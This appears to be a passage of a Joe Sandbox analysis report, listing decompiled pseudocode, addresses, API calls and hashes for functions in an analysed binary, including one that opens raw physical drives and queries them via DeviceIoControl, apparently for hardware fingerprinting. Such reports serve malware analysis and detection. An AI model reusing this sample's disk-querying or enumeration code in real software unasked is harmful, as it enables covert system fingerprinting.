				if(_t34 == 0) {
					L16:
					_t22 = E00C8A060( *_t33 + 8);
					if(_t22 != 0) {
						 *_t22 = _v4;
					}
					goto L18;
				} else {
					_push(_t48);
					_push(_t42);
					do {
						_t23 =  *_t46;
						if(_v4 != _t23) {
							_t24 = OpenThread(0x40, 1, _t23);
							if(_t24 != 0) {
								CloseHandle(_t24);
							} else {
								if(GetLastError() != 0x57) {
									OutputDebugStringW("****** ");
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x5ac)) + 0x5a8)) =  *((intOrPtr*)(_t46 + 0x5a8));
									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x5a8)) + 0x5ac)) =  *((intOrPtr*)(_t46 + 0x5ac));
									_t31 = GetProcessHeap();
									if(_t31 != 0) {
										HeapFree(_t31, 0, _t46);
									}
								}
							}
						} else {
							_v8 = _t46;
						}
						_t26 =  *_t33;
						_t46 =  *(_t26 + 0x5b8);
						_t27 = _t26 + 8;
						if(_t46 == _t27) {
							break;
						}
						 *((intOrPtr*)(_t27 + 0x5b0)) =  *((intOrPtr*)(_t46 + 0x5a8));
					} while (_t46 != 0);
					_t22 = _v16;
					if(_t22 != 0) {
						L18:
						return _t22;
					}
					goto L16;
				}
			}



















                                                                                                                                                                                          0x00c89cd0
                                                                                                                                                                                          0x00c89cd0
                                                                                                                                                                                          0x00c89cd0
                                                                                                                                                                                          0x00c89cd3
                                                                                                                                                                                          0x00c89ce0
                                                                                                                                                                                          0x00c89ce4
                                                                                                                                                                                          0x00c89ce6
                                                                                                                                                                                          0x00c89cec
                                                                                                                                                                                          0x00c89cef
                                                                                                                                                                                          0x00c89cf7
                                                                                                                                                                                          0x00c89d03
                                                                                                                                                                                          0x00c89cf9
                                                                                                                                                                                          0x00c89cf9
                                                                                                                                                                                          0x00c89cf9
                                                                                                                                                                                          0x00c89d0a
                                                                                                                                                                                          0x00c89d0e
                                                                                                                                                                                          0x00c89dbd
                                                                                                                                                                                          0x00c89dc2
                                                                                                                                                                                          0x00c89dc9
                                                                                                                                                                                          0x00c89dcf
                                                                                                                                                                                          0x00c89dcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89d14
                                                                                                                                                                                          0x00c89d14
                                                                                                                                                                                          0x00c89d1b
                                                                                                                                                                                          0x00c89d22
                                                                                                                                                                                          0x00c89d22
                                                                                                                                                                                          0x00c89d28
                                                                                                                                                                                          0x00c89d35
                                                                                                                                                                                          0x00c89d39
                                                                                                                                                                                          0x00c89d8a
                                                                                                                                                                                          0x00c89d3b
                                                                                                                                                                                          0x00c89d44
                                                                                                                                                                                          0x00c89d81
                                                                                                                                                                                          0x00c89d46
                                                                                                                                                                                          0x00c89d52
                                                                                                                                                                                          0x00c89d64
                                                                                                                                                                                          0x00c89d6a
                                                                                                                                                                                          0x00c89d6e
                                                                                                                                                                                          0x00c89d74
                                                                                                                                                                                          0x00c89d74
                                                                                                                                                                                          0x00c89d6e
                                                                                                                                                                                          0x00c89d44
                                                                                                                                                                                          0x00c89d2a
                                                                                                                                                                                          0x00c89d2a
                                                                                                                                                                                          0x00c89d2a
                                                                                                                                                                                          0x00c89d90
                                                                                                                                                                                          0x00c89d92
                                                                                                                                                                                          0x00c89d98
                                                                                                                                                                                          0x00c89d9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89da5
                                                                                                                                                                                          0x00c89dab
                                                                                                                                                                                          0x00c89db3
                                                                                                                                                                                          0x00c89dbb
                                                                                                                                                                                          0x00c89dd1
                                                                                                                                                                                          0x00c89dd5
                                                                                                                                                                                          0x00c89dd5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89dbb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C89CDA
                                                                                                                                                                                          • OpenThread.KERNEL32(00000040,00000001,-00000008,00000000,?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000), ref: 00C89D35
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C89D3B
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C89D6A
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000), ref: 00C89D74
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(****** ,?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C89D81
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,00C89C40,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C89D8A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapThread$CloseCurrentDebugErrorFreeHandleLastOpenOutputProcessString
                                                                                                                                                                                          • String ID: ******
                                                                                                                                                                                          • API String ID: 2450575844-1974978773
                                                                                                                                                                                          • Opcode ID: 81d89d8784fc387515d06d2a0b39544a8f0e314724668096dd669d37e572a20b
                                                                                                                                                                                          • Instruction ID: 1d32067697a5e7f8c7086b25cbb3f80564e30b8dff1db5b9caac8b219b37931b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81d89d8784fc387515d06d2a0b39544a8f0e314724668096dd669d37e572a20b
                                                                                                                                                                                          • Instruction Fuzzy Hash: C53128746047019FCB24AB69DC44B7B7BE4EF8531AF19456EE89ADB350D730A800CF6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C96800 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00C96800(signed int __ecx, void* __edx, void* __ebp, intOrPtr _a4) {
				struct _OVERLAPPED* _v4;
				char _v12;
				signed int _v20;
				short _v532;
				char _v1006;
				char _v1032;
				void _v1068;
				char _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				char _v1094;
				intOrPtr _v1096;
				intOrPtr _v1100;
				void _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void _v1128;
				intOrPtr _v1132;
				struct _OVERLAPPED* _v1136;
				long _v1140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t45;
				void* _t51;
				void* _t59;
				void* _t80;
				void* _t100;
				void* _t104;
				void* _t105;
				void* _t108;
				void* _t110;
				signed int _t111;
				signed int _t112;

				_push(0xffffffff);
				_push(0xd38a8b);
				_push( *[fs:0x0]);
				_t111 = _t110 - 0x468;
				_t43 =  *0xd64070; // 0x8a9e1774
				_v20 = _t43 ^ _t111;
				_push(__ebp);
				_t45 =  *0xd64070; // 0x8a9e1774
				_push(_t45 ^ _t111);
				 *[fs:0x0] =  &_v12;
				_v1132 = _a4;
				_t104 = __edx;
				E00C964E0(0x200,  &_v532, L"\\\\.\\PhysicalDrive%d", __ecx & 0x000000ff);
				_t108 = 0;
				_t112 = _t111 + 8;
				_v1136 = 0;
				_t95 =  &_v532;
				_v4 = 0;
				_t51 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t51 != 0xffffffff) {
					_t108 = _t51;
					_v1136 = _t108;
					L2:
					_v1128 = 0;
					_v1124 = 0;
					_v1120 = 0;
					_v1116 = 0;
					_v1112 = 0;
					_v1108 = 0;
					_v1140 = 0;
					if(DeviceIoControl(_t108, 0x74080, 0, 0,  &_v1128, 0x18,  &_v1140, 0) != 0) {
						E00D006A0(DeviceIoControl,  &_v1068, 0, 0x211);
						_t112 = _t112 + 0xc;
						_v1096 = 0;
						_v1104 = 0;
						_v1100 = 0;
						_v1092 = 0;
						_v1088 = 0;
						_v1084 = 0;
						_v1080 = 0;
						_v1076 = 0;
						_v1072 = 0;
						_t95 =  &_v1104;
						_v1094 = 0xec;
						if(DeviceIoControl(_t108, 0x7c088,  &_v1104, 0x20,  &_v1068, 0x211,  &_v1140, 0) == 0) {
							goto L3;
						}
						E00C96600(0x14,  &_v1032);
						E00C90D20(_t104);
						E00C90C60(0, 0x14, _t104, _t108, _t104,  &_v1032);
						E00C96F20(_t104, 0x14, E00C96E90(_t104, 0x14, DeviceIoControl));
						E00C96600(0x28,  &_v1006);
						_t106 = _v1140;
						E00C90D20(_v1140);
						_t95 = 0x28;
						E00C90C60(_t104, 0x28, _v1140, _t108, _t106,  &_v1006);
						E00C96F20(_t106, 0x28, E00C96E90(_t106, 0x28, _t67));
						_v20 = 0xffffffff;
						if(_t108 != 0) {
							CloseHandle(_t108);
						}
						_t59 = 1;
						L11:
						 *[fs:0x0] = _v12;
						_pop(_t100);
						_pop(_t105);
						_pop(_t80);
						return E00D0071A(_t59, _t80, _v20 ^ _t112, _t95, _t100, _t105);
					}
					L3:
					_v4 = 0xffffffff;
					if(_t108 != 0) {
						CloseHandle(_t108);
					}
					L5:
					_t59 = 0;
					goto L11;
				}
				if(E00C963C0() != 0) {
					goto L5;
				}
				goto L2;
			}












































                                                                                                                                                                                          0x00c96800
                                                                                                                                                                                          0x00c96802
                                                                                                                                                                                          0x00c9680d
                                                                                                                                                                                          0x00c9680e
                                                                                                                                                                                          0x00c96814
                                                                                                                                                                                          0x00c9681b
                                                                                                                                                                                          0x00c96823
                                                                                                                                                                                          0x00c96826
                                                                                                                                                                                          0x00c9682d
                                                                                                                                                                                          0x00c96835
                                                                                                                                                                                          0x00c96846
                                                                                                                                                                                          0x00c9685b
                                                                                                                                                                                          0x00c9685d
                                                                                                                                                                                          0x00c96862
                                                                                                                                                                                          0x00c96864
                                                                                                                                                                                          0x00c96869
                                                                                                                                                                                          0x00c9687d
                                                                                                                                                                                          0x00c96885
                                                                                                                                                                                          0x00c9688c
                                                                                                                                                                                          0x00c96895
                                                                                                                                                                                          0x00c968fc
                                                                                                                                                                                          0x00c968fe
                                                                                                                                                                                          0x00c968a0
                                                                                                                                                                                          0x00c968a9
                                                                                                                                                                                          0x00c968ad
                                                                                                                                                                                          0x00c968b1
                                                                                                                                                                                          0x00c968b5
                                                                                                                                                                                          0x00c968b9
                                                                                                                                                                                          0x00c968bd
                                                                                                                                                                                          0x00c968d5
                                                                                                                                                                                          0x00c968dd
                                                                                                                                                                                          0x00c9690f
                                                                                                                                                                                          0x00c96916
                                                                                                                                                                                          0x00c9691a
                                                                                                                                                                                          0x00c9691e
                                                                                                                                                                                          0x00c96922
                                                                                                                                                                                          0x00c96926
                                                                                                                                                                                          0x00c9692a
                                                                                                                                                                                          0x00c9692e
                                                                                                                                                                                          0x00c96932
                                                                                                                                                                                          0x00c96936
                                                                                                                                                                                          0x00c9693a
                                                                                                                                                                                          0x00c9694f
                                                                                                                                                                                          0x00c9695a
                                                                                                                                                                                          0x00c96963
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96975
                                                                                                                                                                                          0x00c9697a
                                                                                                                                                                                          0x00c9698d
                                                                                                                                                                                          0x00c9699b
                                                                                                                                                                                          0x00c969ac
                                                                                                                                                                                          0x00c969b1
                                                                                                                                                                                          0x00c969b5
                                                                                                                                                                                          0x00c969c3
                                                                                                                                                                                          0x00c969c8
                                                                                                                                                                                          0x00c969d6
                                                                                                                                                                                          0x00c969db
                                                                                                                                                                                          0x00c969e8
                                                                                                                                                                                          0x00c969eb
                                                                                                                                                                                          0x00c969eb
                                                                                                                                                                                          0x00c969f1
                                                                                                                                                                                          0x00c969f6
                                                                                                                                                                                          0x00c969fd
                                                                                                                                                                                          0x00c96a05
                                                                                                                                                                                          0x00c96a06
                                                                                                                                                                                          0x00c96a08
                                                                                                                                                                                          0x00c96a1d
                                                                                                                                                                                          0x00c96a1d
                                                                                                                                                                                          0x00c968df
                                                                                                                                                                                          0x00c968df
                                                                                                                                                                                          0x00c968ec
                                                                                                                                                                                          0x00c968ef
                                                                                                                                                                                          0x00c968ef
                                                                                                                                                                                          0x00c968f5
                                                                                                                                                                                          0x00c968f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c968f5
                                                                                                                                                                                          0x00c9689e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C964E0: _vswprintf_s.LIBCMT ref: 00C9650C
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00000002), ref: 00C9688C
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C968D9
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C968EF
                                                                                                                                                                                            • Part of subcall function 00C963C0: GetLastError.KERNEL32(00C9689C), ref: 00C963C0
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9690F
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C9695F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C969EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseControlDeviceHandle$CreateErrorFileLast_memset_vswprintf_s
                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 1100394461-2935326385
                                                                                                                                                                                          • Opcode ID: 29fca4cf1e97f17e62dd30f2133bdcacaf0d3950be34c3bc7c9408feb35d5ca6
                                                                                                                                                                                          • Instruction ID: 68a22be9bb892cfa54e76008b37f53be67b4c41c5510c0d7ad55f72847553134
                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fca4cf1e97f17e62dd30f2133bdcacaf0d3950be34c3bc7c9408feb35d5ca6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951B7B15083449FD760DF78C889B6BB7E8EB88754F404A2DF598C32C1EB7499048B63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CDCF38 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00CDCF38(struct _WIN32_FIND_DATAW* __ecx, void* __edi, void* __eflags, WCHAR* _a4) {
				void* _t10;
				WCHAR* _t14;
				intOrPtr _t17;
				WCHAR* _t20;
				void* _t24;
				WCHAR* _t25;
				struct _WIN32_FIND_DATAW* _t27;
				WCHAR* _t28;

				_t24 = __edi;
				_t27 = __ecx;
				E00CDC813(__ecx);
				_t28 = _a4;
				if(_t28 != 0) {
					if(lstrlenW(_t28) < 0x104) {
						L2:
						E00CDC2F7( &(_t27->cFileName), 0x104, _t28);
						_t10 = FindFirstFileW(_t28, _t27);
						 *(_t27 + 0x45c) = _t10;
						if(_t10 == 0xffffffff) {
							goto L6;
						}
						_push(_t24);
						_t25 = _t27 + 0x250;
						if(GetFullPathNameW(_t28, 0x104, _t25, 0) != 0) {
							_t20 = E00D03B18(_t25, 0x5c);
							_t14 = E00D03B18(_t25, 0x2f);
							if(_t14 != 0) {
								L10:
								if(_t20 == 0) {
									_t20 = _t25;
								}
								if(_t14 < _t20) {
									 *_t20 = 0;
								} else {
									 *_t14 = 0;
								}
								L15:
								_t17 = 1;
								 *((intOrPtr*)(_t27 + 0x460)) = 1;
								L16:
								return _t17;
							}
							if(_t20 == 0) {
								goto L15;
							}
							_t14 = _t25;
							goto L10;
						}
						E00CDC813(_t27);
						SetLastError(0x7b);
						_t17 = 0;
						goto L16;
					}
					L6:
					return 0;
				}
				_t28 = L"*.*";
				goto L2;
			}











                                                                                                                                                                                          0x00cdcf38
                                                                                                                                                                                          0x00cdcf3b
                                                                                                                                                                                          0x00cdcf3d
                                                                                                                                                                                          0x00cdcf42
                                                                                                                                                                                          0x00cdcf4d
                                                                                                                                                                                          0x00cdcfa7
                                                                                                                                                                                          0x00cdcf54
                                                                                                                                                                                          0x00cdcf5a
                                                                                                                                                                                          0x00cdcf64
                                                                                                                                                                                          0x00cdcf6a
                                                                                                                                                                                          0x00cdcf73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcf75
                                                                                                                                                                                          0x00cdcf78
                                                                                                                                                                                          0x00cdcf89
                                                                                                                                                                                          0x00cdcfb8
                                                                                                                                                                                          0x00cdcfba
                                                                                                                                                                                          0x00cdcfc4
                                                                                                                                                                                          0x00cdcfcc
                                                                                                                                                                                          0x00cdcfce
                                                                                                                                                                                          0x00cdcfd0
                                                                                                                                                                                          0x00cdcfd0
                                                                                                                                                                                          0x00cdcfd4
                                                                                                                                                                                          0x00cdcfdf
                                                                                                                                                                                          0x00cdcfd6
                                                                                                                                                                                          0x00cdcfd8
                                                                                                                                                                                          0x00cdcfd8
                                                                                                                                                                                          0x00cdcfe2
                                                                                                                                                                                          0x00cdcfe4
                                                                                                                                                                                          0x00cdcfe5
                                                                                                                                                                                          0x00cdcfeb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcfeb
                                                                                                                                                                                          0x00cdcfc8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcfca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcfca
                                                                                                                                                                                          0x00cdcf8d
                                                                                                                                                                                          0x00cdcf94
                                                                                                                                                                                          0x00cdcf9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcf9a
                                                                                                                                                                                          0x00cdcfa9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cdcfa9
                                                                                                                                                                                          0x00cdcf4f
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00CDC813: FindClose.KERNEL32(?,?,00CDCF42,00000190,?,?,00CE844F,?,?,?,?,?,?,?,0000000C), ref: 00CDC82D
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF64
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF81
                                                                                                                                                                                          • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF94
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000190,?,?,00CE844F,?,?,?,?,?,?,?,0000000C), ref: 00CDCF9F
                                                                                                                                                                                          • _wcsrchr.LIBCMT ref: 00CDCFB0
                                                                                                                                                                                          • _wcsrchr.LIBCMT ref: 00CDCFBA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 3086268848-438819550
                                                                                                                                                                                          • Opcode ID: 883543be39ad92e62b284e872e56046bfe883c096220c0e419cfa50a31e196dc
                                                                                                                                                                                          • Instruction ID: 334551f7e2600ead91d6f1024336ca996e4821ff726b3f0994720e650914b0b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 883543be39ad92e62b284e872e56046bfe883c096220c0e419cfa50a31e196dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA11BF713003066BD7206BF59CC8FAB369EEF59741F00083AFB6AD6382E6609904D671
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9BC79 Relevance: 12.0, APIs: 8, Instructions: 50windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00C9BC79() {
				void* __esi;
				void* _t20;
				void* _t23;
				void* _t24;
				int _t27;
				void* _t28;
				signed int _t29;

				if(IsWindow( *(_t29 - 0x60)) != 0) {
					if(IsIconic( *(_t29 - 0x60)) != 0) {
						ShowWindow( *(_t29 - 0x60), 9);
					}
					if(IsWindowVisible( *(_t29 - 0x60)) == 0) {
						ShowWindow( *(_t29 - 0x60), 5);
					}
					SetForegroundWindow( *(_t29 - 0x60));
					SetWindowPos( *(_t29 - 0x60), 0xffffffff, _t27, _t27, _t27, _t27, 3);
					SetWindowPos( *(_t29 - 0x60), 0xfffffffe, _t27, _t27, _t27, _t27, 3);
				}
				_pop(_t24);
				_pop(_t28);
				_pop(_t20);
				return E00D0071A(0, _t20,  *(_t29 + 0x1b4) ^ _t29, _t23, _t24, _t28);
			}










                                                                                                                                                                                          0x00c9bc84
                                                                                                                                                                                          0x00c9bc9b
                                                                                                                                                                                          0x00c9bca2
                                                                                                                                                                                          0x00c9bca2
                                                                                                                                                                                          0x00c9bcaf
                                                                                                                                                                                          0x00c9bcb6
                                                                                                                                                                                          0x00c9bcb6
                                                                                                                                                                                          0x00c9bcbb
                                                                                                                                                                                          0x00c9bcd2
                                                                                                                                                                                          0x00c9bcdf
                                                                                                                                                                                          0x00c9bcdf
                                                                                                                                                                                          0x00c9c0e9
                                                                                                                                                                                          0x00c9c0f0
                                                                                                                                                                                          0x00c9c0f3
                                                                                                                                                                                          0x00c9c100

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00C9BC7C
                                                                                                                                                                                          • IsIconic.USER32 ref: 00C9BC8D
                                                                                                                                                                                          • ShowWindow.USER32(?,00000009), ref: 00C9BCA2
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00C9BCA7
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00C9BCB6
                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00C9BCBB
                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000003), ref: 00C9BCD2
                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FE,?,?,?,?,00000003,?,?,?,?,00000003), ref: 00C9BCDF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Show$ForegroundIconicVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3801054008-0
                                                                                                                                                                                          • Opcode ID: 402fad96543676abdaf8a2249c18b5dc08bcba65bb3016d7abad9da7b0920733
                                                                                                                                                                                          • Instruction ID: a6285d6d48b578897a54dc0227280442b8afcc0e9136c1aa7bd7fae0ac24ece2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 402fad96543676abdaf8a2249c18b5dc08bcba65bb3016d7abad9da7b0920733
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E01E53161532CBADF212B66ED0CEDF7E2AFF417A1F100120B459AA1B0DB214D10DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE8B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E00CFE8B0(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v260;
				char _v1284;
				struct _OVERLAPPED* _v1288;
				struct _OVERLAPPED* _v1292;
				struct _OVERLAPPED* _v1296;
				struct _OVERLAPPED* _v1300;
				struct _OVERLAPPED* _v1304;
				void _v1308;
				long _v1312;
				long _v1316;
				intOrPtr _v1320;
				void* _v1324;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
